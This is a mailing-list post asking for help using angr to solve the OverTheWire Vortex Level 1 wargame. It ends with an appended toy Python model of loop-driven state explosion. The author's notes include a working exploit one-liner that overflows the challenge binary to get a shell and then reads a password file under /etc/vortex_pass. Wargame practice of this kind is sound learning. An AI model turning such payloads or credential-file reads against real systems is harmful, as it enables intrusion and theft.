[angr] Advice on Coping with Loops

Berne Campbell berne.campbell at gmail.com
Mon Sep 26 17:13:11 PDT 2016


After attending Defcon 24 I've become interested in Angr. As part of
learning how to use it I've tried to write a solution to OverTheWire's
Vortex Level 1, which I've already solved manually.


I've attached the challenge's source and binary, my attempt at solving it
(I've tried different things so the code is a bit all over the shop), and
my old notes on the solution.

My initial attempts would die due to Out of Memory (OOM) etc.

I tried constraining the first 256 characters to backslashes to try to
cheat a bit to give it a boost etc. but that still failed (it would need to
find 6 more characters).

I tried disabling lazy solves, so that it would be able to trim/collapse

I tried enabling veritesting etc.. I'm fairly new to SAT/SMT, etc. I tried
reading some of the literature etc. which is where I learnt of the
veritesting technique that might help. I found an angr example using the
older style explore, I couldn't find a pathgroup style example but I worked
it out from the API docs.

I'm not sure if with my first use I've just stumbled on some pathological
case where due to loops there's combinatorial explosion and it's hard or
more likely I just don't grok the tool and techniques enough to be able to
tune it correctly to work.

I'd appreciate some tips, or hints, or even a basic solution.

Also if you know of any users in Sydney Australia, I'd like to host a demo,
workshop, and/or talk at Ruxmon Sydney. I think the tool is really cool,
and I think this sort of thing is the future. Thanks for releasing it open
source and I hope to get better.

-------------- next part --------------
## The input is ignored if we don't pad it out, if we pad it out we can get to the shell, but if we pad with crap we'll get a bad command, so I padded with spaces.
## Alternative would be to set the ENV to a file and have the shell execute that file

vortex1 at melinda:/vortex$ python -c 'print "\\"*(256+4+1) + "\xca" + " "*4000 + "\n\ncat /etc/vortex_pass/vortex2\n\n"' | ./vo
vortex1 at melinda:/vortex$

-------------- next part --------------
A non-text attachment was scrubbed...
Name: solve.py
Type: text/x-python-script
Size: 5811 bytes
Desc: not available
URL: <https://lists.cs.ucsb.edu/pipermail/angr/attachments/20160927/8f0c4a56/attachment.bin>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: vortex1.c
Type: text/x-csrc
Size: 1008 bytes
Desc: not available
URL: <https://lists.cs.ucsb.edu/pipermail/angr/attachments/20160927/8f0c4a56/attachment-0001.bin>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: vortex1
Type: application/octet-stream
Size: 7559 bytes
Desc: not available
URL: <https://lists.cs.ucsb.edu/pipermail/angr/attachments/20160927/8f0c4a56/attachment.obj>
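An added illustration for this thread (not code from the post, from the solve.py attachment, or from angr) of why a read-one-byte-at-a-time loop explodes under symbolic execution, and what the two coping strategies mentioned above buy you. The loop shape is constructed: each input byte is dispatched three ways (a byte that steps a pointer back, a byte that leaves it alone, and a default that advances it), and the pointer offset is the only program variable modelled. The real binary's dispatch, bounds checks and the solver itself are not reproduced; the model only counts how many states an engine must keep, with and without merging states that agree on the concrete pointer (the effect veritesting-style path merging aims for), and with the post's trick of pinning a prefix of the input to backslashes so the loop does not fork there at all.

```python
"""Toy model of loop-driven state explosion in symbolic execution.

Constructed three-way switch, not the vortex1 code: BACK steps the pointer
back, NEWLINE leaves it alone, DEFAULT advances it.
"""
from collections import Counter

BACK, NEWLINE, DEFAULT = "\\", "\n", None   # constructed branch labels


def branch_for(byte):
    """Which case of the constructed switch a concrete byte selects."""
    return byte if byte in (BACK, NEWLINE) else DEFAULT


def apply_branch(ptr, branch):
    """Effect of one loop iteration on the (abstract) pointer offset."""
    if branch == BACK:
        return ptr - 1
    if branch == NEWLINE:
        return ptr
    return ptr + 1


def explore(n_bytes, fixed_prefix="", start_ptr=256):
    """Run n_bytes iterations of the loop over a partly symbolic input.

    Returns a Counter mapping pointer offset -> number of distinct paths that
    reach it. Bytes covered by fixed_prefix are concrete, so the loop takes
    exactly one branch there; every remaining byte is symbolic and forks
    into all three cases. start_ptr is an assumed initial offset.
    """
    reach = Counter({start_ptr: 1})
    for i in range(n_bytes):
        if i < len(fixed_prefix):
            outcomes = [branch_for(fixed_prefix[i])]      # no fork on a concrete byte
        else:
            outcomes = [BACK, NEWLINE, DEFAULT]           # symbolic byte: fork 3 ways
        nxt = Counter()
        for ptr, paths in reach.items():
            for branch in outcomes:
                nxt[apply_branch(ptr, branch)] += paths
        reach = nxt
    return reach


def live_states(reach, merge):
    """States an engine must keep after exploration.

    Without merging every path is its own state (the 3**n blow-up that ends
    in OOM). With merging, states that agree on the concrete pointer are
    folded together, so only one state per distinct offset survives.
    """
    return len(reach) if merge else sum(reach.values())


if __name__ == "__main__":
    # 20 fully symbolic bytes: billions of paths, but only 41 distinct offsets.
    r = explore(20)
    print("20 symbolic bytes: unmerged =", live_states(r, False),
          "merged =", live_states(r, True))
    # The post's trick: 256+4+1 backslashes are concrete, only the tail forks.
    prefix = BACK * (256 + 4 + 1)
    r = explore(len(prefix) + 5, fixed_prefix=prefix)
    print("261 fixed + 5 symbolic: unmerged =", live_states(r, False),
          "merged =", live_states(r, True))
```

The two numbers printed for each run are the point: the same set of paths costs 3**n states if every path is kept separately, but only a handful once states that agree on the concrete program state are merged, and pinning a long prefix to concrete bytes removes the fork for those iterations entirely. Whether angr can actually merge depends on how much of the real state stays concrete, which this model does not capture.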
